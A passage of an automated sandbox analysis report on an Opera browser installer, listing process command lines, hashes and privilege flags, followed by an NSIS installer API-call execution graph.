                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Antivirus matches:
                                                                                                                                            • Detection: 0%, ReversingLabs
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:32
                                                                                                                                            Start time:11:40:04
                                                                                                                                            Start date:09/12/2024
                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --showunbox=0 --installfolder="C:\Users\user\AppData\Local\Programs\Opera" --profile-folder --language=en-GB --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=3532 --package-dir-prefix="C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20241209114004" --session-guid=00c18248-fcc9-4b6b-a8b7-0c50518d9022 --server-tracking-blob="MWZkNGE2YjNhYTYzYjQxNzE2YmZkZTM0YzhlOTRjYTQ1ODNlOGY3ODRmYzMyNmQ3ZDRjMGY4Zjk2MzM2NDEwODp7ImNvdW50cnkiOiJVUyIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cz91dG1fc291cmNlPURXTkxTVCZ1dG1fbWVkaXVtPWFwYiZ1dG1fY2FtcGFpZ249cjEwIiwic3lzdGVtIjp7InBsYXRmb3JtIjp7ImFyY2giOiJ4ODZfNjQiLCJvcHN5cyI6IldpbmRvd3MiLCJvcHN5cy12ZXJzaW9uIjoiMTAiLCJwYWNrYWdlIjoiRVhFIn19LCJ0aW1lc3RhbXAiOiIxNzMzNzYyMzk4LjE0MjgiLCJ1c2VyYWdlbnQiOiJOU0lTX0luZXRjIChNb3ppbGxhKSIsInV0bSI6eyJjYW1wYWlnbiI6InIxMCIsIm1lZGl1bSI6ImFwYiIsInNvdXJjZSI6IkRXTkxTVCJ9LCJ1dWlkIjoiNWU5Y2QwZDQtYTQ2My00MzE3LTk1ODQtNTZkMjA3ZjRlYTc0In0= " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=0C06000000000000
                                                                                                                                            Imagebase:0xce0000
                                                                                                                                            File size:5'740'952 bytes
                                                                                                                                            MD5 hash:F9DA76E8D7DB633AB031EE5AC59BB55E
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:false

                                                                                                                                            Target ID:33
                                                                                                                                            Start time:11:40:05
                                                                                                                                            Start date:09/12/2024
                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=115.0.5322.77 --initial-client-data=0x324,0x328,0x32c,0x300,0x330,0x6bd17cf4,0x6bd17d00,0x6bd17d0c
                                                                                                                                            Imagebase:0xce0000
                                                                                                                                            File size:5'740'952 bytes
                                                                                                                                            MD5 hash:F9DA76E8D7DB633AB031EE5AC59BB55E
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:false

                                                                                                                                            Reset < >

                                                                                                                                              Execution Graph

                                                                                                                                              Execution Coverage:32.3%
                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                              Signature Coverage:16.2%
                                                                                                                                              Total number of Nodes:1392
                                                                                                                                              Total number of Limit Nodes:52
                                                                                                                                              execution_graph 3257 401bc0 3258 401c11 3257->3258 3264 401bcd 3257->3264 3259 401c16 3258->3259 3260 401c3b GlobalAlloc 3258->3260 3270 401c56 3259->3270 3276 4066a2 lstrcpynW 3259->3276 3277 4066df 3260->3277 3261 4023af 3263 4066df 21 API calls 3261->3263 3267 4023bc 3263->3267 3264->3261 3265 401be4 3264->3265 3294 4066a2 lstrcpynW 3265->3294 3296 405d02 3267->3296 3269 401c28 GlobalFree 3269->3270 3272 401bf3 3295 4066a2 lstrcpynW 3272->3295 3274 401c02 3300 4066a2 lstrcpynW 3274->3300 3276->3269 3279 4066ea 3277->3279 3278 406931 3280 40694a 3278->3280 3323 4066a2 lstrcpynW 3278->3323 3279->3278 3282 406902 lstrlenW 3279->3282 3286 4067fb GetSystemDirectoryW 3279->3286 3287 4066df 15 API calls 3279->3287 3288 406811 GetWindowsDirectoryW 3279->3288 3289 4066df 15 API calls 3279->3289 3290 4068a3 lstrcatW 3279->3290 3293 406873 SHGetPathFromIDListW CoTaskMemFree 3279->3293 3301 406570 3279->3301 3306 406a96 GetModuleHandleA 3279->3306 3312 406950 3279->3312 3321 4065e9 wsprintfW 3279->3321 3322 4066a2 lstrcpynW 3279->3322 3280->3270 3282->3279 3286->3279 3287->3282 3288->3279 3289->3279 3290->3279 3293->3279 3294->3272 3295->3274 3297 405d17 3296->3297 3298 405d63 3297->3298 3299 405d2b MessageBoxIndirectW 3297->3299 3298->3270 3299->3298 3300->3270 3324 40650f 3301->3324 3304 4065a4 RegQueryValueExW RegCloseKey 3305 4065d4 3304->3305 3305->3279 3307 406ab2 3306->3307 3308 406abc GetProcAddress 3306->3308 3328 406a26 GetSystemDirectoryW 3307->3328 3310 406acb 3308->3310 3310->3279 3311 406ab8 3311->3308 3311->3310 3319 40695d 3312->3319 3313 4069d3 3314 4069d8 CharPrevW 3313->3314 3317 4069f9 3313->3317 3314->3313 3315 4069c6 CharNextW 3315->3313 3315->3319 3317->3279 3318 4069b2 CharNextW 3318->3319 3319->3313 3319->3315 3319->3318 3320 4069c1 CharNextW 3319->3320 3331 405f9e 3319->3331 3320->3315 3321->3279 3322->3279 3323->3280 3325 40651e 3324->3325 3326 406522 3325->3326 3327 406527 RegOpenKeyExW 3325->3327 3326->3304 3326->3305 3327->3326 3329 406a48 wsprintfW LoadLibraryExW 3328->3329 3329->3311 3332 405fa4 3331->3332 3333 405fba 3332->3333 3334 405fab CharNextW 3332->3334 3333->3319 3334->3332 4379 406dc0 4381 406c44 4379->4381 4380 4075af 4381->4380 4382 406cc5 GlobalFree 4381->4382 4383 406cce GlobalAlloc 4381->4383 4384 406d45 GlobalAlloc 4381->4384 4385 406d3c GlobalFree 4381->4385 4382->4383 4383->4380 4383->4381 4384->4380 4384->4381 4385->4384 4386 402641 4387 402dcb 21 API calls 4386->4387 4388 402648 4387->4388 4391 406192 GetFileAttributesW CreateFileW 4388->4391 4390 402654 4391->4390 3497 4025c3 3508 402e0b 3497->3508 3501 4025d6 3502 4025f2 RegEnumKeyW 3501->3502 3503 4025fe RegEnumValueW 3501->3503 3506 402953 3501->3506 3504 40261a RegCloseKey 3502->3504 3503->3504 3505 402613 3503->3505 3504->3506 3505->3504 3509 402dcb 21 API calls 3508->3509 3510 402e22 3509->3510 3511 40650f RegOpenKeyExW 3510->3511 3512 4025cd 3511->3512 3513 402da9 3512->3513 3514 4066df 21 API calls 3513->3514 3515 402dbe 3514->3515 3515->3501 4392 4015c8 4393 402dcb 21 API calls 4392->4393 4394 4015cf SetFileAttributesW 4393->4394 4395 4015e1 4394->4395 3531 401fc9 3532 402dcb 21 API calls 3531->3532 3533 401fcf 3532->3533 3534 405727 28 API calls 3533->3534 3535 401fd9 3534->3535 3544 405c85 CreateProcessW 3535->3544 3540 402953 3541 401ff4 3543 402002 CloseHandle 3541->3543 3552 4065e9 wsprintfW 3541->3552 3543->3540 3545 401fdf 3544->3545 3546 405cb8 CloseHandle 3544->3546 3545->3540 3545->3543 3547 406b41 WaitForSingleObject 3545->3547 3546->3545 3548 406b5b 3547->3548 3549 406b6d GetExitCodeProcess 3548->3549 3553 406ad2 3548->3553 3549->3541 3552->3543 3554 406aef PeekMessageW 3553->3554 3555 406ae5 DispatchMessageW 3554->3555 3556 406aff WaitForSingleObject 3554->3556 3555->3554 3556->3548 3557 4014cb 3558 405727 28 API calls 3557->3558 3559 4014d2 3558->3559 4403 404acb 4404 404b01 4403->4404 4405 404adb 4403->4405 4406 404688 8 API calls 4404->4406 4407 404621 22 API calls 4405->4407 4408 404b0d 4406->4408 4409 404ae8 SetDlgItemTextW 4407->4409 4409->4404 3560 40254f 3561 402e0b 21 API calls 3560->3561 3562 402559 3561->3562 3563 402dcb 21 API calls 3562->3563 3564 402562 3563->3564 3565 40256d RegQueryValueExW 3564->3565 3567 402953 3564->3567 3566 40258d 3565->3566 3570 402593 RegCloseKey 3565->3570 3566->3570 3571 4065e9 wsprintfW 3566->3571 3570->3567 3571->3570 3572 4021cf 3573 402dcb 21 API calls 3572->3573 3574 4021d6 3573->3574 3575 402dcb 21 API calls 3574->3575 3576 4021e0 3575->3576 3577 402dcb 21 API calls 3576->3577 3578 4021ea 3577->3578 3579 402dcb 21 API calls 3578->3579 3580 4021f4 3579->3580 3581 402dcb 21 API calls 3580->3581 3582 4021fe 3581->3582 3583 40223d CoCreateInstance 3582->3583 3584 402dcb 21 API calls 3582->3584 3587 40225c 3583->3587 3584->3583 3586 40231b 3587->3586 3588 401423 3587->3588 3589 405727 28 API calls 3588->3589 3590 401431 3589->3590 3590->3586 4410 40204f 4411 402dcb 21 API calls 4410->4411 4412 402056 4411->4412 4413 406a96 5 API calls 4412->4413 4414 402065 4413->4414 4415 402081 GlobalAlloc 4414->4415 4417 4020f1 4414->4417 4416 402095 4415->4416 4415->4417 4418 406a96 5 API calls 4416->4418 4419 40209c 4418->4419 4420 406a96 5 API calls 4419->4420 4421 4020a6 4420->4421 4421->4417 4425 4065e9 wsprintfW 4421->4425 4423 4020df 4426 4065e9 wsprintfW 4423->4426 4425->4423 4426->4417 4427 401a55 4428 402dcb 21 API calls 4427->4428 4429 401a5e ExpandEnvironmentStringsW 4428->4429 4430 401a72 4429->4430 4432 401a85 4429->4432 4431 401a77 lstrcmpW 4430->4431 4430->4432 4431->4432 3822 4014d7 3823 402da9 21 API calls 3822->3823 3824 4014dd Sleep 3823->3824 3826 402c4f 3824->3826 4433 404757 lstrcpynW lstrlenW 4439 4023d7 4440 4023df 4439->4440 4443 4023e5 4439->4443 4441 402dcb 21 API calls 4440->4441 4441->4443 4442 4023f3 4445 402401 4442->4445 4446 402dcb 21 API calls 4442->4446 4443->4442 4444 402dcb 21 API calls 4443->4444 4444->4442 4447 402dcb 21 API calls 4445->4447 4446->4445 4448 40240a WritePrivateProfileStringW 4447->4448 4449 402459 4450 402461 4449->4450 4451 40248c 4449->4451 4453 402e0b 21 API calls 4450->4453 4452 402dcb 21 API calls 4451->4452 4454 402493 4452->4454 4455 402468 4453->4455 4460 402e89 4454->4460 4457 4024a0 4455->4457 4458 402dcb 21 API calls 4455->4458 4459 402479 RegDeleteValueW RegCloseKey 4458->4459 4459->4457 4461 402e96 4460->4461 4462 402e9d 4460->4462 4461->4457 4462->4461 4464 402ece 4462->4464 4465 40650f RegOpenKeyExW 4464->4465 4466 402efc 4465->4466 4467 402fa6 4466->4467 4468 402f0c RegEnumValueW 4466->4468 4469 402f2f 4466->4469 4467->4461 4468->4469 4470 402f96 RegCloseKey 4468->4470 4469->4470 4471 402f6b RegEnumKeyW 4469->4471 4472 402f74 RegCloseKey 4469->4472 4475 402ece 6 API calls 4469->4475 4470->4467 4471->4469 4471->4472 4473 406a96 5 API calls 4472->4473 4474 402f84 4473->4474 4474->4467 4476 402f88 RegDeleteKeyW 4474->4476 4475->4469 4476->4467 4477 40175a 4478 402dcb 21 API calls 4477->4478 4479 401761 SearchPathW 4478->4479 4480 40177c 4479->4480 4481 401d5d 4482 402da9 21 API calls 4481->4482 4483 401d64 4482->4483 4484 402da9 21 API calls 4483->4484 4485 401d70 GetDlgItem 4484->4485 4486 40265d 4485->4486 4494 4047e0 4495 4047f8 4494->4495 4499 404912 4494->4499 4500 404621 22 API calls 4495->4500 4496 40497c 4497 404a46 4496->4497 4498 404986 GetDlgItem 4496->4498 4505 404688 8 API calls 4497->4505 4501 4049a0 4498->4501 4502 404a07 4498->4502 4499->4496 4499->4497 4503 40494d GetDlgItem SendMessageW 4499->4503 4504 40485f 4500->4504 4501->4502 4506 4049c6 SendMessageW LoadCursorW SetCursor 4501->4506 4502->4497 4507 404a19 4502->4507 4527 404643 KiUserCallbackDispatcher 4503->4527 4509 404621 22 API calls 4504->4509 4516 404a41 4505->4516 4528 404a8f 4506->4528 4511 404a2f 4507->4511 4512 404a1f SendMessageW 4507->4512 4514 40486c CheckDlgButton 4509->4514 4511->4516 4517 404a35 SendMessageW 4511->4517 4512->4511 4513 404977 4518 404a6b SendMessageW 4513->4518 4525 404643 KiUserCallbackDispatcher 4514->4525 4517->4516 4518->4496 4520 40488a GetDlgItem 4526 404656 SendMessageW 4520->4526 4522 4048a0 SendMessageW 4523 4048c6 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4522->4523 4524 4048bd GetSysColor 4522->4524 4523->4516 4524->4523 4525->4520 4526->4522 4527->4513 4531 405cc8 ShellExecuteExW 4528->4531 4530 4049f5 LoadCursorW SetCursor 4530->4502 4531->4530 4532 402663 4533 402692 4532->4533 4534 402677 4532->4534 4536 4026c2 4533->4536 4537 402697 4533->4537 4535 402da9 21 API calls 4534->4535 4547 40267e 4535->4547 4539 402dcb 21 API calls 4536->4539 4538 402dcb 21 API calls 4537->4538 4540 40269e 4538->4540 4541 4026c9 lstrlenW 4539->4541 4549 4066c4 WideCharToMultiByte 4540->4549 4541->4547 4543 4026b2 lstrlenA 4543->4547 4544 40270c 4545 4026f6 4545->4544 4546 406244 WriteFile 4545->4546 4546->4544 4547->4544 4547->4545 4548 406273 5 API calls 4547->4548 4548->4545 4549->4543 3939 403665 SetErrorMode GetVersionExW 3940 4036f1 3939->3940 3941 4036b9 GetVersionExW 3939->3941 3942 403748 3940->3942 3943 406a96 5 API calls 3940->3943 3941->3940 3944 406a26 3 API calls 3942->3944 3943->3942 3945 40375e lstrlenA 3944->3945 3945->3942 3946 40376e 3945->3946 3947 406a96 5 API calls 3946->3947 3948 403775 3947->3948 3949 406a96 5 API calls 3948->3949 3950 40377c 3949->3950 3951 406a96 5 API calls 3950->3951 3952 403788 #17 OleInitialize SHGetFileInfoW 3951->3952 4027 4066a2 lstrcpynW 3952->4027 3955 4037d7 GetCommandLineW 4028 4066a2 lstrcpynW 3955->4028 3957 4037e9 3958 405f9e CharNextW 3957->3958 3959 40380f CharNextW 3958->3959 3969 403821 3959->3969 3960 403923 3961 403937 GetTempPathW 3960->3961 4029 403634 3961->4029 3963 40394f 3964 403953 GetWindowsDirectoryW lstrcatW 3963->3964 3965 4039a9 DeleteFileW 3963->3965 3967 403634 12 API calls 3964->3967 4039 4030f5 GetTickCount GetModuleFileNameW 3965->4039 3966 405f9e CharNextW 3966->3969 3970 40396f 3967->3970 3969->3960 3969->3966 3973 403925 3969->3973 3970->3965 3972 403973 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3970->3972 3971 4039bd 3974 403bb0 ExitProcess CoUninitialize 3971->3974 3981 405f9e CharNextW 3971->3981 4010 403a64 3971->4010 3975 403634 12 API calls 3972->3975 4125 4066a2 lstrcpynW 3973->4125 3976 403bc2 3974->3976 3977 403be6 3974->3977 3979 4039a1 3975->3979 3980 405d02 MessageBoxIndirectW 3976->3980 3982 403c6a ExitProcess 3977->3982 3983 403bee GetCurrentProcess OpenProcessToken 3977->3983 3979->3965 3979->3974 3986 403bd0 ExitProcess 3980->3986 3991 4039dc 3981->3991 3987 403c06 LookupPrivilegeValueW AdjustTokenPrivileges 3983->3987 3988 403c3a 3983->3988 3987->3988 3990 406a96 5 API calls 3988->3990 3989 403a74 3989->3974 4001 403c41 3990->4001 3992 403a3a 3991->3992 3993 403a7d 3991->3993 3996 406079 18 API calls 3992->3996 4128 405c6d 3993->4128 3995 403c56 ExitWindowsEx 3995->3982 3998 403c63 3995->3998 3999 403a46 3996->3999 4002 40140b 2 API calls 3998->4002 3999->3974 4126 4066a2 lstrcpynW 3999->4126 4001->3995 4001->3998 4002->3982 4003 403a9c 4005 403ab4 4003->4005 4132 4066a2 lstrcpynW 4003->4132 4009 403ada wsprintfW 4005->4009 4024 403b06 4005->4024 4006 403a59 4127 4066a2 lstrcpynW 4006->4127 4011 4066df 21 API calls 4009->4011 4069 403d74 4010->4069 4011->4005 4014 403b50 SetCurrentDirectoryW 4017 406462 40 API calls 4014->4017 4015 403b16 GetFileAttributesW 4016 403b22 DeleteFileW 4015->4016 4015->4024 4016->4024 4019 403b5f CopyFileW 4017->4019 4018 403b4e 4018->3974 4019->4018 4019->4024 4020 405dae 71 API calls 4020->4024 4021 406462 40 API calls 4021->4024 4022 4066df 21 API calls 4022->4024 4023 405c85 2 API calls 4023->4024 4024->4005 4024->4009 4024->4014 4024->4015 4024->4018 4024->4020 4024->4021 4024->4022 4024->4023 4025 403bd8 CloseHandle 4024->4025 4026 4069ff 2 API calls 4024->4026 4133 405bf6 CreateDirectoryW 4024->4133 4136 405c50 CreateDirectoryW 4024->4136 4025->4018 4026->4024 4027->3955 4028->3957 4030 406950 5 API calls 4029->4030 4032 403640 4030->4032 4031 40364a 4031->3963 4032->4031 4033 405f71 3 API calls 4032->4033 4034 403652 4033->4034 4035 405c50 2 API calls 4034->4035 4036 403658 4035->4036 4037 4061c1 2 API calls 4036->4037 4038 403663 4037->4038 4038->3963 4139 406192 GetFileAttributesW CreateFileW 4039->4139 4041 403138 4068 403145 4041->4068 4140 4066a2 lstrcpynW 4041->4140 4043 40315b 4044 405fbd 2 API calls 4043->4044 4045 403161 4044->4045 4141 4066a2 lstrcpynW 4045->4141 4047 40316c GetFileSize 4048 403266 4047->4048 4059 403183 4047->4059 4049 403053 36 API calls 4048->4049 4050 40326f 4049->4050 4052 4032ab GlobalAlloc 4050->4052 4050->4068 4143 40361d SetFilePointer 4050->4143 4051 403607 ReadFile 4051->4059 4055 4032c2 4052->4055 4054 403303 4057 403053 36 API calls 4054->4057 4060 4061c1 2 API calls 4055->4060 4056 40328c 4058 403607 ReadFile 4056->4058 4057->4068 4061 403297 4058->4061 4059->4048 4059->4051 4059->4054 4062 403053 36 API calls 4059->4062 4059->4068 4063 4032d3 CreateFileW 4060->4063 4061->4052 4061->4068 4062->4059 4064 40330d 4063->4064 4063->4068 4142 40361d SetFilePointer 4064->4142 4066 40331b 4067 403396 48 API calls 4066->4067 4067->4068 4068->3971 4070 406a96 5 API calls 4069->4070 4071 403d88 4070->4071 4072 403da0 4071->4072 4073 403d8e 4071->4073 4074 406570 3 API calls 4072->4074 4159 4065e9 wsprintfW 4073->4159 4075 403dd0 4074->4075 4077 403def lstrcatW 4075->4077 4079 406570 3 API calls 4075->4079 4078 403d9e 4077->4078 4144 40404a 4078->4144 4079->4077 4082 406079 18 API calls 4083 403e21 4082->4083 4084 403eb5 4083->4084 4086 406570 3 API calls 4083->4086 4085 406079 18 API calls 4084->4085 4087 403ebb 4085->4087 4093 403e53 4086->4093 4088 403ecb LoadImageW 4087->4088 4089 4066df 21 API calls 4087->4089 4090 403f71 4088->4090 4091 403ef2 RegisterClassW 4088->4091 4089->4088 4095 40140b 2 API calls 4090->4095 4094 403f28 SystemParametersInfoW CreateWindowExW 4091->4094 4124 403f7b 4091->4124 4092 403e74 lstrlenW 4097 403e82 lstrcmpiW 4092->4097 4098 403ea8 4092->4098 4093->4084 4093->4092 4096 405f9e CharNextW 4093->4096 4094->4090 4099 403f77 4095->4099 4101 403e71 4096->4101 4097->4098 4102 403e92 GetFileAttributesW 4097->4102 4100 405f71 3 API calls 4098->4100 4103 40404a 22 API calls 4099->4103 4099->4124 4104 403eae 4100->4104 4101->4092 4105 403e9e 4102->4105 4107 403f88 4103->4107 4160 4066a2 lstrcpynW 4104->4160 4105->4098 4106 405fbd 2 API calls 4105->4106 4106->4098 4109 403f94 ShowWindow 4107->4109 4110 404017 4107->4110 4112 406a26 3 API calls 4109->4112 4152 4057fa OleInitialize 4110->4152 4114 403fac 4112->4114 4113 40401d 4115 404021 4113->4115 4116 404039 4113->4116 4117 403fba GetClassInfoW 4114->4117 4119 406a26 3 API calls 4114->4119 4122 40140b 2 API calls 4115->4122 4115->4124 4118 40140b 2 API calls 4116->4118 4120 403fe4 DialogBoxParamW 4117->4120 4121 403fce GetClassInfoW RegisterClassW 4117->4121 4118->4124 4119->4117 4123 40140b 2 API calls 4120->4123 4121->4120 4122->4124 4123->4124 4124->3989 4125->3961 4126->4006 4127->4010 4129 406a96 5 API calls 4128->4129 4130 403a82 lstrlenW 4129->4130 4131 4066a2 lstrcpynW 4130->4131 4131->4003 4132->4005 4134 405c42 4133->4134 4135 405c46 GetLastError 4133->4135 4134->4024 4135->4134 4137 405c60 4136->4137 4138 405c64 GetLastError 4136->4138 4137->4024 4138->4137 4139->4041 4140->4043 4141->4047 4142->4066 4143->4056 4145 40405e 4144->4145 4161 4065e9 wsprintfW 4145->4161 4147 4040cf 4148 404103 22 API calls 4147->4148 4150 4040d4 4148->4150 4149 403dff 4149->4082 4150->4149 4151 4066df 21 API calls 4150->4151 4151->4150 4153 40466d SendMessageW 4152->4153 4157 40581d 4153->4157 4154 405844 4155 40466d SendMessageW 4154->4155 4156 405856 CoUninitialize 4155->4156 4156->4113 4157->4154 4158 401389 2 API calls 4157->4158 4158->4157 4159->4078 4160->4084 4161->4147 4162 405866 4163 405a10 4162->4163 4164 405887 GetDlgItem GetDlgItem GetDlgItem 4162->4164 4166 405a41 4163->4166 4167 405a19 GetDlgItem CreateThread CloseHandle 4163->4167 4207 404656 SendMessageW 4164->4207 4169 405a6c 4166->4169 4171 405a91 4166->4171 4172 405a58 ShowWindow ShowWindow 4166->4172 4167->4166 4210 4057fa 5 API calls 4167->4210 4168 4058f7 4176 4058fe GetClientRect GetSystemMetrics SendMessageW SendMessageW 4168->4176 4170 405acc 4169->4170 4173 405a80 4169->4173 4174 405aa6 ShowWindow 4169->4174 4170->4171 4184 405ada SendMessageW 4170->4184 4175 404688 8 API calls 4171->4175 4209 404656 SendMessageW 4172->4209 4178 4045fa SendMessageW 4173->4178 4180 405ac6 4174->4180 4181 405ab8 4174->4181 4179 405a9f 4175->4179 4182 405950 SendMessageW SendMessageW 4176->4182 4183 40596c 4176->4183 4178->4171 4186 4045fa SendMessageW 4180->4186 4185 405727 28 API calls 4181->4185 4182->4183 4187 405971 SendMessageW 4183->4187 4188 40597f 4183->4188 4184->4179 4189 405af3 CreatePopupMenu 4184->4189 4185->4180 4186->4170 4187->4188 4191 404621 22 API calls 4188->4191 4190 4066df 21 API calls 4189->4190 4192 405b03 AppendMenuW 4190->4192 4193 40598f 4191->4193 4194 405b20 GetWindowRect 4192->4194 4195 405b33 TrackPopupMenu 4192->4195 4196 405998 ShowWindow 4193->4196 4197 4059cc GetDlgItem SendMessageW 4193->4197 4194->4195 4195->4179 4198 405b4e 4195->4198 4199 4059bb 4196->4199 4200 4059ae ShowWindow 4196->4200 4197->4179 4201 4059f3 SendMessageW SendMessageW 4197->4201 4202 405b6a SendMessageW 4198->4202 4208 404656 SendMessageW 4199->4208 4200->4199 4201->4179 4202->4202 4203 405b87 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4202->4203 4205 405bac SendMessageW 4203->4205 4205->4205 4206 405bd5 GlobalUnlock SetClipboardData CloseClipboard 4205->4206 4206->4179 4207->4168 4208->4197 4209->4169 4217 4015e6 4218 402dcb 21 API calls 4217->4218 4219 4015ed 4218->4219 4220 40601c 4 API calls 4219->4220 4234 4015f6 4220->4234 4221 401656 4223 401688 4221->4223 4224 40165b 4221->4224 4222 405f9e CharNextW 4222->4234 4226 401423 28 API calls 4223->4226 4225 401423 28 API calls 4224->4225 4227 401662 4225->4227 4232 401680 4226->4232 4236 4066a2 lstrcpynW 4227->4236 4229 405c50 2 API calls 4229->4234 4230 405c6d 5 API calls 4230->4234 4231 40166f SetCurrentDirectoryW 4231->4232 4233 40163c GetFileAttributesW 4233->4234 4234->4221 4234->4222 4234->4229 4234->4230 4234->4233 4235 405bf6 2 API calls 4234->4235 4235->4234 4236->4231 4248 401c68 4249 402da9 21 API calls 4248->4249 4250 401c6f 4249->4250 4251 402da9 21 API calls 4250->4251 4252 401c7c 4251->4252 4253 402dcb 21 API calls 4252->4253 4255 401c91 4252->4255 4253->4255 4254 401ca1 4257 401cf8 4254->4257 4258 401cac 4254->4258 4255->4254 4256 402dcb 21 API calls 4255->4256 4256->4254 4259 402dcb 21 API calls 4257->4259 4260 402da9 21 API calls 4258->4260 4262 401cfd 4259->4262 4261 401cb1 4260->4261 4263 402da9 21 API calls 4261->4263 4264 402dcb 21 API calls 4262->4264 4265 401cbd 4263->4265 4266 401d06 FindWindowExW 4264->4266 4267 401ce8 SendMessageW 4265->4267 4268 401cca SendMessageTimeoutW 4265->4268 4269 401d28 4266->4269 4267->4269 4268->4269 4550 404e68 4551 404e94 4550->4551 4552 404e78 4550->4552 4554 404ec7 4551->4554 4555 404e9a SHGetPathFromIDListW 4551->4555 4561 405ce6 GetDlgItemTextW 4552->4561 4557 404eb1 SendMessageW 4555->4557 4558 404eaa 4555->4558 4556 404e85 SendMessageW 4556->4551 4557->4554 4559 40140b 2 API calls 4558->4559 4559->4557 4561->4556 4562 4028e9 4563 4028ef 4562->4563 4564 4028f7 FindClose 4563->4564 4565 402c4f 4563->4565 4564->4565 4566 4016f1 4567 402dcb 21 API calls 4566->4567 4568 4016f7 GetFullPathNameW 4567->4568 4569 401733 4568->4569 4570 401711 4568->4570 4571 401748 GetShortPathNameW 4569->4571 4572 402c4f 4569->4572 4570->4569 4573 4069ff 2 API calls 4570->4573 4571->4572 4574 401723 4573->4574 4574->4569 4576 4066a2 lstrcpynW 4574->4576 4576->4569 4577 401e73 GetDC 4578 402da9 21 API calls 4577->4578 4579 401e85 GetDeviceCaps MulDiv ReleaseDC 4578->4579 4580 402da9 21 API calls 4579->4580 4581 401eb6 4580->4581 4582 4066df 21 API calls 4581->4582 4583 401ef3 CreateFontIndirectW 4582->4583 4584 40265d 4583->4584 4305 402975 4306 402dcb 21 API calls 4305->4306 4307 402981 4306->4307 4308 402997 4307->4308 4309 402dcb 21 API calls 4307->4309 4310 40616d 2 API calls 4308->4310 4309->4308 4311 40299d 4310->4311 4333 406192 GetFileAttributesW CreateFileW 4311->4333 4313 4029aa 4314 402a60 4313->4314 4315 4029c5 GlobalAlloc 4313->4315 4316 402a48 4313->4316 4317 402a67 DeleteFileW 4314->4317 4318 402a7a 4314->4318 4315->4316 4319 4029de 4315->4319 4320 403396 48 API calls 4316->4320 4317->4318 4334 40361d SetFilePointer 4319->4334 4322 402a55 CloseHandle 4320->4322 4322->4314 4323 4029e4 4324 403607 ReadFile 4323->4324 4325 4029ed GlobalAlloc 4324->4325 4326 402a31 4325->4326 4327 4029fd 4325->4327 4328 406244 WriteFile 4326->4328 4329 403396 48 API calls 4327->4329 4330 402a3d GlobalFree 4328->4330 4332 402a0a 4329->4332 4330->4316 4331 402a28 GlobalFree 4331->4326 4332->4331 4333->4313 4334->4323 4585 4014f5 SetForegroundWindow 4586 402c4f 4585->4586 4601 40197b 4602 402dcb 21 API calls 4601->4602 4603 401982 lstrlenW 4602->4603 4604 40265d 4603->4604 4351 4020fd 4352 40210f 4351->4352 4362 4021c1 4351->4362 4353 402dcb 21 API calls 4352->4353 4355 402116 4353->4355 4354 401423 28 API calls 4356 40231b 4354->4356 4357 402dcb 21 API calls 4355->4357 4358 40211f 4357->4358 4359 402135 LoadLibraryExW 4358->4359 4360 402127 GetModuleHandleW 4358->4360 4361 402146 4359->4361 4359->4362 4360->4359 4360->4361 4373 406b05 4361->4373 4362->4354 4365 402190 4369 405727 28 API calls 4365->4369 4366 402157 4367 402176 KiUserCallbackDispatcher 4366->4367 4368 40215f 4366->4368 4371 402167 4367->4371 4370 401423 28 API calls 4368->4370 4369->4371 4370->4371 4371->4356 4372 4021b3 FreeLibrary 4371->4372 4372->4356 4378 4066c4 WideCharToMultiByte 4373->4378 4375 406b22 4376 406b29 GetProcAddress 4375->4376 4377 402151 4375->4377 4376->4377 4377->4365 4377->4366 4378->4375 4612 402b7e 4613 402bd0 4612->4613 4614 402b85 4612->4614 4615 406a96 5 API calls 4613->4615 4617 402da9 21 API calls 4614->4617 4618 402bce 4614->4618 4616 402bd7 4615->4616 4619 402dcb 21 API calls 4616->4619 4620 402b93 4617->4620 4621 402be0 4619->4621 4622 402da9 21 API calls 4620->4622 4621->4618 4623 402be4 IIDFromString 4621->4623 4625 402b9f 4622->4625 4623->4618 4624 402bf3 4623->4624 4624->4618 4630 4066a2 lstrcpynW 4624->4630 4629 4065e9 wsprintfW 4625->4629 4627 402c10 CoTaskMemFree 4627->4618 4629->4618 4630->4627 4631 401000 4632 401037 BeginPaint GetClientRect 4631->4632 4633 40100c DefWindowProcW 4631->4633 4635 4010f3 4632->4635 4636 401179 4633->4636 4637 401073 CreateBrushIndirect FillRect DeleteObject 4635->4637 4638 4010fc 4635->4638 4637->4635 4639 